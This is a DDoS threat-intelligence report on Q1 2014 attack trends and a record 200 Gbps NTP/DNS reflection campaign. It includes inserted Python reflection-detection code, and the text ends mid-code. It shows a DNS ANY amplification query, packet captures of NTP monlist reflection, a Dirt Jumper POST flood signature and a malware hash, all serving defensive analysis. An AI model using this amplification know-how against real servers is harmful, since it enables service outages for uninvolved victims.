
Prolexic Quarterly Global DDoS Attack Report Q1 2014

Malicious actors choose reflection, not infection, to launch high-bandwidth attacks

www.prolexic.com

Akamai's State of the Internet Report: Gain insight into the critical Internet metrics, events and trends that impact your business online. Download the report and associated infographics at akamai.com/stateoftheinternet. Download the new State of the Internet iOS app, now available in the Apple App Store.

Akamai is a leading provider of cloud services for delivering, optimizing and securing online content and business applications. At the core of the company's solutions is the Akamai Intelligent Platform, providing extensive reach coupled with unmatched reliability, security, visibility and expertise. Akamai removes the complexities of connecting the increasingly mobile world, supporting 24/7 consumer demand, and enabling enterprises to securely leverage the cloud. To learn more about how Akamai is accelerating the pace of innovation in a hyperconnected world, please visit www.akamai.com or blogs.akamai.com, and follow @Akamai on Twitter.

Letter from the editor

As you may be aware, Akamai completed the acquisition of Prolexic, a leader in DDoS mitigation services, in February 2014. Prolexic's Global DDoS Attack Report and Akamai's State of the Internet Report both cover DDoS attacks and related trends and statistics. In the coming quarters, we will consolidate these publications with the goal of publishing a combined report that delivers an unparalleled level of insight into the Internet threat landscape. Follow @akamai_soti on Twitter for more information.

Table of contents

Analysis and emerging trends
  Compared to Q1 2013
  Compared to Q4 2013
Total attack vectors
  Infrastructure layer attacks
  Application layer attacks
  Comparison: Attack vectors (Q1 2014, Q4 2013, Q1 2013)
Target industries
  Media and entertainment
  Software and technology
  Security
  Financial services
  Gaming
  Summary
Top 10 source countries
  Comparison: Top 10 source countries (Q1 2014, Q4 2013, Q1 2013)
Total attacks per week (Q1 2014 vs. Q1 2013)
Comparison: Attack campaign start time per day (Q1 2014, Q4 2013, Q1 2013)
Attack spotlight: Q1's record-setting DDoS attack
  Overview
  Validated attack vectors used in this campaign
    DNS amplification
    NTP monlist reflection
    POST flood
  Analysis of associated malware
  Visualization of sourced traffic
    Source countries of the DNS reflection attacks
    Source countries for the NTP reflection attacks
    Source countries for POST attacks from the Drive toolkit
Case study: A reflected application DDoS attack
  Overview
  Characteristics of the WordPress DDoS pingback application reflection attack
  Highlighted campaigns
    Campaign A (Internet media company)
    Campaign B (A Prolexic/Akamai site)
  Recommended detection rules
  Conclusion
Looking forward
About Prolexic Security Engineering & Response Team (PLXsert)
About Prolexic

At a glance

Compared to Q1 2013
  47% increase in total DDoS attacks
  9% decrease in average attack bandwidth
  68% increase in infrastructure (Layer 3 & 4) attacks
  21% decrease in application (Layer 7) attacks
  50% decrease in average attack duration: 35 vs. 17 hours
  133% increase in average peak bandwidth

Compared to Q4 2013
  18% increase in total DDoS attacks
  39% increase in average attack bandwidth
  35% increase in infrastructure (Layer 3 & 4) attacks
  36% decrease in application (Layer 7) attacks
  24% decrease in average attack duration: 23 vs. 17 hours
  114% increase in average peak bandwidth

Analysis and emerging trends

Q1 2014 continued the trend of increasing botnet construction and decreasing traditional malware infection. This is a result of the widespread availability of reflection-based distributed denial-of-service (DDoS) toolkits that let malicious actors build and deploy botnets for DDoS attacks. Crimeware toolkits that use reflection and amplification techniques to abuse Internet protocols allow malicious actors to launch massive attacks by using vulnerable servers and devices without the traditional need for malware infection.

Since 2013, attackers have been abusing communication protocols such as Character Generator (CHARGEN), Network Time Protocol (NTP) and Domain Name System (DNS). These are all based on the User Datagram Protocol (UDP), which indirectly allows attackers to conceal their identities via address spoofing so they are not immediately identified as the source of an attack. Attackers send small request packets to intermediary victim servers, and those servers in turn respond to the attacker's intended target. The availability of these vulnerable protocols, which are often enabled by default in server software, makes the Internet a ready-to-use botnet of potential victim devices that can be exploited by malicious actors to launch huge attacks.
In Q1, malicious attackers delivered attacks more frequently and at higher packet-per-second rates than in the previous quarter. This quarter saw a 39 percent increase in average bandwidth. What's more, the largest-ever DDoS attack to cross the Prolexic (now part of Akamai) DDoS mitigation network occurred during this quarter. The attack used a combination of reflection techniques to target the infrastructure along with a traditional botnet-based application attack. The attack, which exceeded 10 hours in length, peaked at more than 200 Gbps (gigabits per second) and 53.5 Mpps (million packets per second).

The larger-than-average Q1 attack bandwidth rates were correlated with a significant trend toward volumetric, infrastructure-based attacks, a type of attack that seeks to consume as much bandwidth as possible. There was a corresponding reduction in the use of application-layer attacks. This trend echoes the availability of DDoS tools that are designed to use infrastructure attacks. Innovation in the DDoS marketplace is resulting in tools that inflict more damage with fewer resources. Q1's high-volume attacks were made possible by the availability of easy-to-use DDoS tools from the DDoS-as-a-Service marketplace. These tools can be used with minimal skill on the part of the attacker. Application-layer attacks, which were less popular this quarter, typically require greater skill and coordination by attackers.
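The reflection mechanism described above leaves a network-level footprint that a defender can look for without payload inspection: large UDP packets arriving from a service port (CHARGEN 19, DNS 53, NTP 123) on many distinct servers, aimed at a host that never sent those servers a request. The following Python is an added example, not code from the report or from Prolexic; it applies that check to flow records. The Flow records, the RFC 5737 documentation addresses, the 440-byte packet size used for the NTP sample and the detection thresholds are all constructed or assumed values.

```python
"""Added example: flag reflection/amplification traffic in flow records.

Not from the Prolexic report. Flow records, addresses (RFC 5737 documentation
ranges) and thresholds are constructed for illustration.
"""
from collections import defaultdict
from dataclasses import dataclass
from typing import Dict, Iterable, List

# UDP services the report names as reflection vectors. In reflected traffic the
# source port is the service port and the destination is the victim.
REFLECTION_PORTS = {19: "CHARGEN", 53: "DNS", 123: "NTP"}


@dataclass(frozen=True)
class Flow:
    """One unidirectional UDP flow record (NetFlow/IPFIX style, constructed)."""
    src_ip: str
    src_port: int
    dst_ip: str
    dst_port: int
    packets: int
    byte_count: int


def detect_reflection(flows: Iterable[Flow], min_sources: int = 3,
                      min_avg_bytes: int = 400) -> Dict[str, Dict[str, dict]]:
    """Return {victim_ip: {service: summary}} for hosts receiving unsolicited,
    large responses from many distinct servers on a reflection-prone port.

    Two tells are checked: the "answers" were never requested by the victim
    (no matching outbound flow), and they arrive from many servers at once
    with large average packet sizes, as amplified answers do.
    """
    flows = list(flows)
    # Requests the monitored hosts really sent: (client, server, service_port).
    requested = {(f.src_ip, f.dst_ip, f.dst_port)
                 for f in flows if f.dst_port in REFLECTION_PORTS}

    agg = defaultdict(lambda: {"sources": set(), "packets": 0, "bytes": 0})
    for f in flows:
        service = REFLECTION_PORTS.get(f.src_port)
        if service is None:
            continue
        # A reply that matches a request we saw is ordinary client traffic.
        if (f.dst_ip, f.src_ip, f.src_port) in requested:
            continue
        bucket = agg[(f.dst_ip, service)]
        bucket["sources"].add(f.src_ip)
        bucket["packets"] += f.packets
        bucket["bytes"] += f.byte_count

    findings: Dict[str, Dict[str, dict]] = {}
    for (victim, service), b in agg.items():
        avg = b["bytes"] / b["packets"]
        if len(b["sources"]) >= min_sources and avg >= min_avg_bytes:
            findings.setdefault(victim, {})[service] = {
                "sources": len(b["sources"]),
                "packets": b["packets"],
                "avg_bytes_per_packet": round(avg, 1),
            }
    return findings


# Constructed sample: four NTP servers sending 440-byte packets (the size of an
# NTP monlist reply) to 203.0.113.10, which never queried them; one ordinary
# DNS exchange and one normal 48-byte NTP reply for 203.0.113.20.
SAMPLE_FLOWS: List[Flow] = [
    Flow("192.0.2.1", 123, "203.0.113.10", 80, 1000, 440_000),
    Flow("192.0.2.2", 123, "203.0.113.10", 80, 800, 352_000),
    Flow("192.0.2.3", 123, "203.0.113.10", 80, 1200, 528_000),
    Flow("192.0.2.4", 123, "203.0.113.10", 80, 500, 220_000),
    Flow("203.0.113.20", 40123, "198.51.100.53", 53, 1, 60),   # real DNS query
    Flow("198.51.100.53", 53, "203.0.113.20", 40123, 1, 120),  # its answer
    Flow("192.0.2.9", 123, "203.0.113.20", 123, 2, 96),        # single small NTP reply
]

if __name__ == "__main__":
    for victim, services in detect_reflection(SAMPLE_FLOWS).items():
        for service, s in services.items():
            print(f"{victim}: unsolicited {service} responses from "
                  f"{s['sources']} servers, {s['packets']} packets, "
                  f"{s['avg_bytes_per_packet']} B/pkt")
```

On the sample, only 203.0.113.10 is reported (four NTP sources, 3,500 packets averaging 440 bytes); the DNS answer is suppressed because the matching query was seen, and the lone NTP reply fails both the source-count and packet-size thresholds. In production the same logic runs over exported flows at the border, where the distinct-source count is the most robust signal: a few large responses are normal, hundreds of servers answering a host that asked none of them are not.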

In Q1, NTP reflection attacks surged, likely due to the availability of DDoS attack tools that use this reflection technique. In this quarter, the NTP flood method went from accounting for less than 1 percent of all attacks in the prior quarter to nearly the same popularity as SYN flood attacks. In Q1 2013, neither CHARGEN nor NTP attack vectors were observed. In Q1 2014, however, these two attack vectors accounted for 23 percent of all infrastructure attacks mitigated by Prolexic.

The Media and Entertainment industry was the most frequently targeted industry in Q1. This industry received large portions of NTP reflection attack traffic and application-based attacks, including GET floods. Moreover, the Media and Entertainment vertical was targeted by 54 percent of the malicious packets mitigated by Prolexic during active DDoS attacks in Q1.

A large amount of malicious activity continued to come from Asian countries in Q1, six of which appear in the Top 10 source countries. They accounted for 60 percent of attacks.

Compared to Q1 2013

Compared to the same quarter one year ago, the total number of DDoS attacks increased 47 percent. This increase occurred despite a 21 percent drop in application-layer attacks, marking a continuing shift towards infrastructure-based methods. Some of the increase in infrastructure attacks can be attributed to the emergence of CHARGEN and NTP reflection attack vectors, neither of which was observed in Q1 2013. These two attack vectors alone accounted for 23 percent of the infrastructure attacks mitigated by Prolexic in Q1 2014.

Figure 1: Peak bandwidth average (Q1 2014, Q4 2013, Q1 2013)

Average attack duration decreased this quarter compared with Q1 2013, dropping to 17 hours versus 35 hours. Average bandwidth dropped 9 percent in Q1 2014 compared to a year earlier, while packets per second (pps) increased 24 percent.
In short, Q1 2014 DDoS attack campaigns were as disruptive as those from the previous year. The major difference was the attack execution style: malicious actors delivered more frequent DDoS attacks with higher packet per second rates than a year ago. Despite lower average bandwidths than in Q1 2013, Q1 2014 attacks also saw the largest peak attack rates (bps) to date.

Compared to Q4 2013

This quarter saw the continuation of more frequent DDoS attacks, along with an uptick in infrastructure-based attacks. Prolexic observed an 18 percent increase in total attacks in Q1 2014 compared to the prior quarter. The number of infrastructure attacks increased 35 percent, a rise led by a significant increase in the use of the NTP flood attack. NTP floods were starting to surge at the end of Q4. This trend continued through Q1, making NTP one of the more popular attack types this quarter. Comprising almost 17 percent of the attacks mitigated, the NTP flood method reached nearly the same level of usage as the SYN flood.

Another notable change this quarter was a 39 percent increase in average bandwidth. This statistic was highlighted by the largest-ever DDoS attack mitigated by Prolexic, which occurred this quarter and exceeded 200 Gbps.

Figure 2: Peak packets per second (Q1 2014, Q4 2013, Q1 2013)

Total attack vectors

In the first quarter of the year, infrastructure layer attacks took a more dominant position over application layer attacks, a change from the recent historical trend and an increase of 11 percent over the prior quarter. Infrastructure-layer attack vectors represented 87 percent of the attacks, while application layer attack vectors represented only 13 percent. This trend echoes the increased availability and convenience of DDoS attack tools and DDoS-for-hire sites that use infrastructure-based attack methods. In addition, malicious actors are increasingly using DDoS attacks that rely on high bandwidth saturation, leveraging the amplification factor available through reflection tactics. Another contributing factor is their ability to launch DDoS attacks without the need for malware infection. Instead, they are leveraging the Internet as a ready-to-use botnet and victimizing legitimate network devices via common Internet protocols.

Figure 3: DDoS attack vectors and their relative distribution in Q1 2014

Infrastructure layer attacks

Infrastructure-based attacks, also known as volumetric attacks, seek to consume as much bandwidth as possible. These attacks target the network infrastructure and are the attack vectors preferred by today's malicious actors. The Internet is replete with misconfigured and open servers that are vulnerable to protocol abuse. Character Generator (CHARGEN), Network Time Protocol (NTP) and Domain Name System (DNS) are three protocols commonly abused, as observed by PLXsert. The frequency of such protocol abuse in DDoS campaigns is usually driven by the appearance of new tools that can produce more effective attacks.

Prolexic noticed an 11 percent increase in infrastructure-based attacks this quarter compared to last quarter, and a similar increase of 11 percent in comparison to the same quarter a year earlier. In addition, there is a noticeable difference in the types of infrastructure attacks employed in Q1 2014. This included a surge in the number of NTP-based attacks to 17 percent and a decrease in SYN floods to 18 percent. Other protocol-based attacks included UDP floods at 10 percent, ICMP at 10 percent, DNS at 9 percent, and CHARGEN at 3 percent.

Application layer attacks

Application layer attacks require a higher level of knowledge and sophistication to execute than infrastructure attacks. They are directed at applications (Layer 7) such as the Hypertext Transfer Protocol (HTTP) and are not necessarily focused on bandwidth consumption. Unlike volumetric attacks, they seek to cause a specific application to fail or to become unresponsive to legitimate users.

For example, an outage can be caused by a surge in simultaneous connection attempts. It is important to note that application protocols such as HTTP are allowed to pass through many traffic inspection and firewall devices. These DDoS attacks often mimic legitimate traffic produced by web applications, which makes them more difficult to detect before they reach full force. Encrypted SSL attacks add another level of difficulty for DDoS mitigation, requiring the allocation of additional controls and resources.

PLXsert analyzed the use of an application attack involving reflection techniques in which malicious actors were able to abuse features of a web framework suite, specifically WordPress, to cause a massive number of requests to overwhelm a targeted website (see Case study: A reflected application DDoS attack later in this document).

In recent quarters, PLXsert observed a trend where application-based DDoS attacks were gaining ground and being used in greater numbers by malicious actors, topping 20 percent of the total attacks in observed campaigns. The number of observed application-based attacks in this quarter, however, differed markedly from recent quarters. Application layer attacks showed a decrease this quarter, accounting for only 13 percent of observed attacks. HTTP GET floods were the dominant application layer attack at 9 percent, followed by HTTP POST floods at 2 percent, HEAD floods at 0.4 percent, PUSH floods at 0.3 percent, SSL GET floods at 0.1 percent and SSL POST floods at 0.1 percent.

Comparison: Attack vectors (Q1 2014, Q4 2013, Q1 2013)

Significant differences were observed between Q1 2013, Q4 2013 and this quarter. The first difference was a decline in the use of application attack vectors in the first quarter of 2014 (13 percent of the total) in comparison to the first quarter of 2013 (23 percent), a decrease of almost 11 percent.
The drop is also observable when comparing Q1 2014 to the fourth quarter of 2013 (23 percent), a decrease of 10 percent. This quarter's numbers break a trend observed since 2012 of a sustained increase in the use of application-layer vectors compared to the use of infrastructure-layer vectors. Using an application-layer attack vector usually requires a higher degree of skill, as well as more significant effort to build a botnet and coordinate the attack (as was seen with the itsoknoproblembro attacks). Such application attack campaigns have been waning since the end of the third quarter of 2013. Since then, Prolexic has not observed any campaigns using the application-layer attack vector with as much effectiveness, power and duration as the itsoknoproblembro campaigns. However, this could change. For example, a modified brobot botnet could reappear and be used with high frequency against specific industries.

A difference in the use of application-based vectors can also be observed in the use of HTTP GET floods, which were the most common application attack vector in Q1 2013 (19 percent of all attacks) and Q4 2013 (20 percent of all attacks), but represented only 9 percent of all attacks in Q1 2014, a significant drop. These numbers point to a preference by malicious actors in Q1 2014 for the use of infrastructure-based attack vectors. This is possibly driven by the availability of new tools that facilitate infrastructure DDoS attacks using protocols and services susceptible to reflection and amplification, such as NTP and DNS, along with the availability of open or misconfigured DNS and NTP servers on the Internet. There was an overall decrease in application-based attacks of more than 12 points in comparison to Q4 2013 (23 percent) and Q1 2013 (23 percent).
The data also show NTP was the most frequently used infrastructure-based amplification attack at 17 percent, followed by DNS at 9 percent and CHARGEN at 3 percent, in contrast with last quarter when DNS was in first place with 10 percent, followed by CHARGEN at 6 percent, and NTP at 0.3 percent.

Figure 4: Attack vectors in Q1 2014, Q4 2013, Q1 2013

Target industries

Prolexic has introduced a new metric to the DDoS Global Attack Report to provide insight into the industries targeted by malicious actors in DDoS campaigns. Media and Entertainment took the brunt of DDoS attacks, accounting for 50 percent of the attack targets in Q1. Software and Technology was the second most often hit at 17 percent. Security accounted for 12 percent of attacks. Finance was targeted 9 percent of the time. Gaming was the last of the top five industry targets with 7 percent of all observed attacks.

Media and entertainment

The Media and Entertainment industry accounted for a majority of the attacks against Prolexic customers. This fact provides insight into the motivations of attackers. Attacks against the Media and Entertainment vertical offer several perks for malicious actors, including press coverage and high visibility, benefits that may influence their choice of target. High visibility allows campaign organizers to more effectively reach out to supporters and recruit others to join their cause. The Media and Entertainment industry experienced some of the highest volume attacks from both application and infrastructure attack vectors. Forty-two percent of all NTP reflection and amplification attacks in Q1 targeted Media and Entertainment. Prolexic continues to see a major interest by attackers in targeting the Media and Entertainment industry to spread fear and propaganda through political or socially motivated DDoS campaigns. The Media and Entertainment industry was targeted with 54 percent of the malicious packets consumed by Prolexic during active DDoS attacks.

Software and technology

The Software and Technology industry includes companies that provide solutions such as Software as a Service (SaaS) and other cloud-based technologies. This industry was hit with the second greatest number of attacks, accounting for 17 percent. The Software and Technology industry was mainly targeted by infrastructure-layer attacks. The most popular attack vectors against this industry were DNS and NTP reflection and amplification attacks. Software and Technology was the target of these types of attacks 23 and 22 percent of the time, respectively.

Security

The Security vertical includes companies that provide security-based solutions, such as Prolexic. This industry faced 12 percent of all DDoS attacks. The motive behind attacks against the Security vertical is to take down a critical service, leaving a customer susceptible to other attacks. The Security industry also sees a high amount of infrastructure-based attacks, accounting for 12 percent of all NTP attacks, 8 percent of all DNS attacks and 6 percent of all CHARGEN attacks.

Financial services

The Financial Services industry includes major financial institutions, such as banks and trading platforms. It was targeted in 9 percent of total attacks in the first quarter. Financial institutions have been the target of many organized attacks, such as those orchestrated by the organized cyber-crime group Izz ad-Din al-Qassam Cyber Fighters (QCF) using itsoknoproblembro. Fortunately, the Financial industry did not experience many major campaigns this quarter.

A quiet quarter does not necessarily reflect a diminished interest by attackers in this industry. Infrastructure-layer attacks pose the greatest threat to this industry due to the importance of the always-on services it provides. Recently, there have been indicators that suggest major campaigns against the financial vertical could resume. Malicious actors may be pursuing more refined methodologies and information-gathering tools to introduce new attack vectors against this vertical.

Gaming

The Gaming industry includes any company related to online gaming or gaming-related content. Gaming was the fifth most-targeted industry, accounting for 7 percent of total attacks. Attacks against the Gaming industry are frequently motivated by players seeking to gain a competitive advantage. The Gaming industry receives mostly application-layer attacks; 13 percent of GET floods and 23 percent of POST floods targeted Gaming in Q1.

Summary

The data discussed represents only a portion of the active DDoS attack campaigns that occurred in this quarter against the named industries. Prolexic will continue to analyze and take the necessary measures to provide real-time insight into DDoS attacks against specific verticals.

Figure 5: Distribution of attacks targeting key industries

Top 10 source countries

The pie chart shown in Figure 6 represents the Top 10 sources of malicious, non-spoofed DDoS traffic in Q1. The United States was the main source of DDoS attacks in Q1 2014, accounting for 21 percent of attacks. China took second place at 18 percent, relinquishing its spot as the number one source of DDoS attacks for the second quarter in a row. Thailand retained its spot in third place, accounting for 15 percent of attacks. Making its debut in fourth place, Turkey accounted for 13 percent. Germany came in fifth at 8 percent to round off the top five source countries of malicious DDoS traffic. The remainder of the top 10 includes Brazil (6 percent), Italy (5 percent), Indonesia (5 percent), South Korea (5 percent) and Saudi Arabia (4 percent).

There was a noticeable presence of Asian countries in the top 10 source countries. Growing economies and an expanding IT infrastructure, plus large online populations, fuel DDoS attack campaigns. There were also indicators of an increasing amount of hacktivist group activity from Asia. Social and political issues are also known to play major roles in certain countries' presence on the Top 10 source list, such as Turkey.

Figure 6: Top 10 source countries for non-spoofed DDoS attacks in Q1 2014

Comparison: Top 10 source countries (Q1 2014, Q4 2013, Q1 2013)

A look at the source countries from the most recent quarter, as well as Q4 2013 and Q1 2013, illustrates how country rankings in the top 10 fluctuate as new vulnerabilities arise, attack agendas vary, malicious actors change, and existing attacks shift due to DDoS toolkit economics. There was only a slight decrease in the percentage of attacks originating from the United States (21 percent) in Q1 compared to the previous quarter (24 percent), and a decrease of 1 percent from Q1 2013 (22 percent). The United States continues to top China as the main source of DDoS attacks. China (18 percent) retained its spot in second place this quarter, despite a decrease of 1 percent from last quarter (19 percent) and a 23 percent decrease from Q1 2013, when China was responsible for almost half of all attacks. Malicious traffic from Turkey (13 percent) surged in Q1, resulting in the country taking the number four spot with an increase of 7 percent from last quarter (6 percent).

Looking at data from the three individual quarters reveals that Asian countries have continually dominated the top 10. In Q1, Asian countries accounted for 60 percent of attacks among the Top 10, with six Asian countries making the list. Last quarter, Asian countries accounted for 57 percent of the attacks from the top 10, again with six Asian countries making the list. A year ago, Asian countries accounted for 54 percent of attacks from the top 10 list, with four Asian countries making the list. While several of the Asian countries have rotated on and off the list, in every quarter an Asian country has ranked either first or second among the top producers of DDoS attacks.

Figure 7: Top 10 source countries for non-spoofed DDoS attacks in Q1 2014, Q4 2013, Q1 2013

Total attacks per week (Q1 2014 vs. Q1 2013)

As seen in the chart below, Q1 2014 had a peak in total attacks from February 12-18, a week that showed a 191 percent increase in DDoS attacks as compared to the same week in Q1 2013. This surge was due to the increase in CHARGEN and NTP reflection attacks. The highest volume of DDoS attacks per week in Q1 was 47 percent greater than the highest volume of attacks registered in any week in Q1 2013. Although the quarter marked a 21 percent reduction in application attacks, overall there was a 47 percent increase in total attacks. This rise was attributed to a 68 percent increase in total infrastructure attacks compared to Q1 2013.

Figure 8: Changes in DDoS attacks per week Q1 2014 vs. Q1 2013

Comparison: Attack campaign start time per day (Q1 2014, Q4 2013, Q1 2013)

In Q1, a shift occurred in the time of day that DDoS attacks took place. In Q4 2013 and Q1 2013 the majority of attacks occurred around 20:00 GMT (12 p.m. PST and 3 p.m. EST), while attacks in Q1 2014 peaked around 12:00 GMT (4 a.m. PST and 7 a.m. EST). Q1 2014 continued to see similar timeframes, with the highest attack rates taking place between 11:00 GMT (3 a.m. PST and 6 a.m. EST) and 14:00 GMT. One conclusion that may be drawn from this change in attack timing is the introduction of new attack campaigns and political and social influences that may motivate certain organizations or individuals to participate in a DDoS attack. Figure 9 outlines the distribution of attack start times in three quarters. The data indicate a shift in the time of day that the majority of DDoS attacks took place in Q1 2014 versus Q4 2013 and Q1 2013.

Figure 9: Attack campaign start time Q1 2014, Q4 2013, Q1 2013

Prolexic Quarterly Global DDoS Attack Report Q1 2014 18 Attack spotlight: Q1 s record-setting DDoS attack Campaign included NTP, DNS reflection techniques as well as Dirt Jumper botnet Overview In Q1 2014, Prolexic successfully mitigated its largest confirmed DDoS attack campaign against a Prolexic customer. The malicious actors used a powerful combination of Network Time Protocol (NTP) reflection and Domain Name System (DNS) reflection as the main attack vectors, which also included variations of the POST flood attack, a Layer 7 application attack vector. The attack exceeded 10 hours in duration and was directed at a European Internet media company. PLXsert successfully identified the tools used in the campaign. These tools included the latest NTP and DNS reflection attack tools, as well as a popular DDoS toolkit known as Drive, which is a Dirt Jumper variant that utilizes a traditional botnet architecture achieved through malware infection. As described in PLXsert threat advisories and a series of Distributed Reflection Denial of Service (DrDoS) white papers, the NTP and DNS protocols are susceptible to abuse by malicious actors. By abusing features of the protocols, attackers produce amplified responses much larger packet sizes than the originating requests. In addition, these two protocols are based on User Datagram Protocol (UDP), which makes them susceptible to spoofing, allowing attackers to hide the source of the requests. Using these amplification and reflection techniques, this campaign peaked at 200 Gbps (gigabits per second) and 53.5 Mpps (million packets per second). 
The table in Figure 10 shows peak malicious traffic rates at each of the five Prolexic scrubbing centers that routed traffic for DDoS mitigation during the attack campaign:

Scrubbing center    Peak bits per second (bps)    Peak packets per second (pps)
San Jose             11 Gbps                       3 Mpps
London               50 Gbps                      10 Mpps
Hong Kong            18 Gbps                       5.5 Mpps
Washington, DC       30 Gbps                       8 Mpps
Frankfurt           100 Gbps                      27 Mpps

Figure 10: Attack metrics for traffic routed through each of five scrubbing centers during this attack campaign

As shown in Figure 11, the majority of attack traffic traversed Prolexic's European scrubbing centers in Frankfurt and London.

Figure 11: Attack bandwidth distribution per scrubbing center

Figure 12 displays an aggregated view of the progression of attack traffic over time and the subsequent DDoS mitigation at the border in packets per second (pps).

Figure 12: Attack and mitigation timeline in packets per second (pps)

Validated attack vectors used in this campaign

Malicious actors typically mix and match attack vectors to inflict the greatest possible damage on their targets. The particular mix of attack vectors in this campaign was dangerous.

The effectiveness of DDoS strategies is determined not only by the tools used but also by the attack operation. Attackers may switch attack vectors and malicious signature payloads in an effort to bypass automated DDoS mitigation. In the most effective campaigns, attackers will preemptively study, footprint and identify default mitigation procedures in available commercial mitigation technologies.

Three main attack vectors were observed in this campaign:

  DNS reflection, which targets Layer 3 and Layer 4
  NTP monlist reflection, which targets Layer 3 and Layer 4
  Drive POST1 and POST2 floods, which target Layer 7

DNS amplification

A DNS ANY request flood was detected during the campaign. A sample of the request executed via the domain information groper (dig) command is shown in Figure 13. The ANY request results in a 4,112-byte response. Figure 14 shows the payload.

$ dig www.xxxxxx.xxx ANY
;; Truncated, retrying in TCP mode.

; <<>> DiG 9.8.5-P1 <<>> www.xxxxxx.xxx ANY
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 47503
;; flags: qr rd ra; QUERY: 1, ANSWER: 255, AUTHORITY: 0, ADDITIONAL: 0

;; QUESTION SECTION:
;www.xxxxxx.xxx.          IN   ANY

;; ANSWER SECTION:
www.xxxxxx.xxx.     600   IN   A   xxx.xxx.xxx.xxx
www.xxxxxx.xxx.     600   IN   A   xxx.xxx.xxx.xxx
<snip>

;; MSG SIZE  rcvd: 4112

Figure 13: An example ANY request for the domain involved in the attack (domain name not shown). Responses contained 255 A records.

16:39:51.849412 IP 74.208.111.18.53 > x.x.x.x.53: 3573 247/0/1 A 119.148.157.170, A 119.148.156.194, A 119.148.157.247, A 119.148.157.153, A 119.148.156.150, A 119.148.156.185, A 119.148.157.188, A 119.148.157.176, A 119.148.156.183, A 119.148.157.212, A 119.148.157.112, A 119.148.157.171, A 119.148.157.246, A 119.148.156.170, A 119.148.156.147, A 119.148.157.145, A 119.148.157.225, A 119.148.156.171, A 119.148.157.157, A 119.148.157.235, A 119.148.157.245, A 119.148.157.223, A 119.148.157.116, A 119.148.157.187, A 119.148.157.120, A 119.148.156.168, A 119.148.157.113, A 119.148.157.239, A 119.148.156.128, A 119.148.156.117, A 119.148.157.227, A 119.148.157.233, A 119.148.156.177, A 119.148.157.163, A 119.148.157.142, A 119.148.156.163, A 119.148.157.184, A 119.148.157.237, A 119.148.157.208, A 119.148.157.240, A 119.148.157.203, A 119.148.157.127, A 119.148.156.181, A 119.148.156.196, A 119.148.157.172, A 119.148.156.193, A 119.148.157.209, A 119.148.157.100, A 119.148.157.134, A 119.148.156.184, A 119.148.156.172, A 119.148.156.189, A 119.148.157.133, A 119.148.157.146, A 119.148.156.155, A 119.148.157.250, A 119.148.157.174, A 119.148.157.151, A 119.148.157.154, A 119.148.157.221, A 119.148.157.167, A 119.148.156.159, A 119.148.156.143, A 119.148.157.244, A 119.148.157.211, A 119.148.156.160, A 119.148.156.120, A 119.148.156.107, A 119.148.156.134, A 119.148.157.160, A 119.148.156.109, A 119.148.157.202, A 119.148.156.158, A 119.148.157.179, A 119.148.156.156, A 119.148.156.122, A 119.148.157.128, A 119.148.156.136, A 119.148.156.199, A 119.148.156.108, A 119.148.156.192, A 119.148.156.116, A 119.148.156.179, A 119.148.157.101, A 119.148.157.229, A 119.148.157.131, A 119.148.157.143, A 119.148.157.194, A[ domain]

Figure 14: The payload for the DNS ANY query flood

NTP monlist reflection

An NTP reflection attack signature was also observed during the campaign, as shown in Figure 15.
13:52:49.995333 IP 66.172.249.12.123 > x.x.x.x.19276: NTPv2, Reserved, length 440
13:52:49.995370 IP 212.7.200.120.123 > x.x.x.x.13520: NTPv2, Reserved, length 440
13:52:49.995375 IP 212.7.200.120.123 > x.x.x.x.13520: NTPv2, Reserved, length 440
13:52:49.995378 IP 212.7.200.120.123 > x.x.x.x.13520: NTPv2, Reserved, length 440
13:52:49.995405 IP 192.96.205.187.123 > x.x.x.x.54159: NTPv2, Reserved, length 440
13:52:49.995412 IP 192.96.205.187.123 > x.x.x.x.54159: NTPv2, Reserved, length 440
13:52:49.995416 IP 192.96.205.187.123 > x.x.x.x.54159: NTPv2, Reserved, length 440

Figure 15: NTP reflection attack signature

POST flood

An application layer attack (Layer 7) was observed. This attack generated multiple HTTP POST requests with several different signatures in an attempt to bypass DDoS mitigation technologies. PLXsert identified packet signatures that have been associated with the Drive DDoS malware kit.

Analysis of associated malware

The POST flood Layer 7 attacks witnessed during this campaign all seem to match those generated by the Dirt Jumper Drive malware. A Drive binary potentially associated with the attack was analyzed by PLXsert and is shown in Figure 16.

d1e499f1f8253af19b13391122753571 (Dirt Jumper Drive)

Figure 16: The MD5 hash of the Drive binary variant

The Dirt Jumper Drive malware has undergone several iterations since its inception in the underground. Some of the features added to later editions include a -smart command and, more recently, a revamped authentication parameter and command and control (CC or C2) architecture. The binary associated with this campaign, however, included none of the additions of the newer variants. This leads PLXsert to conclude that the first iterations of the toolkit are still being used for large-scale attacks, such as the one highlighted here.

The behavior common to all known Drive variants is to drop a payload to the Windows system directory and execute it as a Windows Service process. Once a successful connection with the C2 has been established, the malware waits for commands from the C2. The variant associated with this campaign supports the following nine attack vectors:

  GET
  POST1
  POST2
  IP
  IP2
  UDP
  request
  timeout
  thread

During this campaign, the POST flood attacks may have been the only commands issued to the infected hosts. The POST floods used a hardcoded string that is populated by the malware at runtime to flood its target. The signature of the POST flood can be seen inside the malware toolkit, as shown in Figure 17:

login=[1000]&pass=[1000]&password=[50]&log=[50]&passwrd=[50]&user=[50]&username=[50]&vb_login_username=[50]&vb_login_md5password=[50]

Figure 17: A POST flood signature observed in this campaign
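The two reflection signatures shown in Figures 14 and 15 (DNS responses from UDP/53 carrying hundreds of answer records, and NTPv2 mode-7 "Reserved" responses from UDP/123 with length 440) can be picked out of captured traffic mechanically. The Python below is an added example, not code from the report or from PLXsert: it classifies tcpdump-style text lines by vector and tallies reflector addresses. The sample lines and addresses are constructed, and the DNS answer-count threshold is an assumption.

```python
"""Classify reflection traffic from tcpdump-style text lines.

Added example (not from the Prolexic report). Recognises the two
reflection signatures in the attack spotlight:
  - DNS responses from source port 53 with hundreds of answer RRs
  - NTPv2 "Reserved" (mode 7, monlist) responses from source port 123
    with length 440
"""
import re
from collections import Counter, defaultdict

# tcpdump prints "TIME IP src.sport > dst.dport: ..." for both protocols.
_HDR = re.compile(
    r"^(?P<ts>\S+) IP (?P<src>\d+\.\d+\.\d+\.\d+)\.(?P<sport>\d+) > "
    r"(?P<dst>[\w.]+)\.(?P<dport>\d+): (?P<rest>.*)$"
)
# DNS reply summary "3573 247/0/1 A ..." = id answers/authority/additional
_DNS = re.compile(r"^\d+[*-]* (?P<an>\d+)/(?P<ns>\d+)/(?P<ar>\d+) ")
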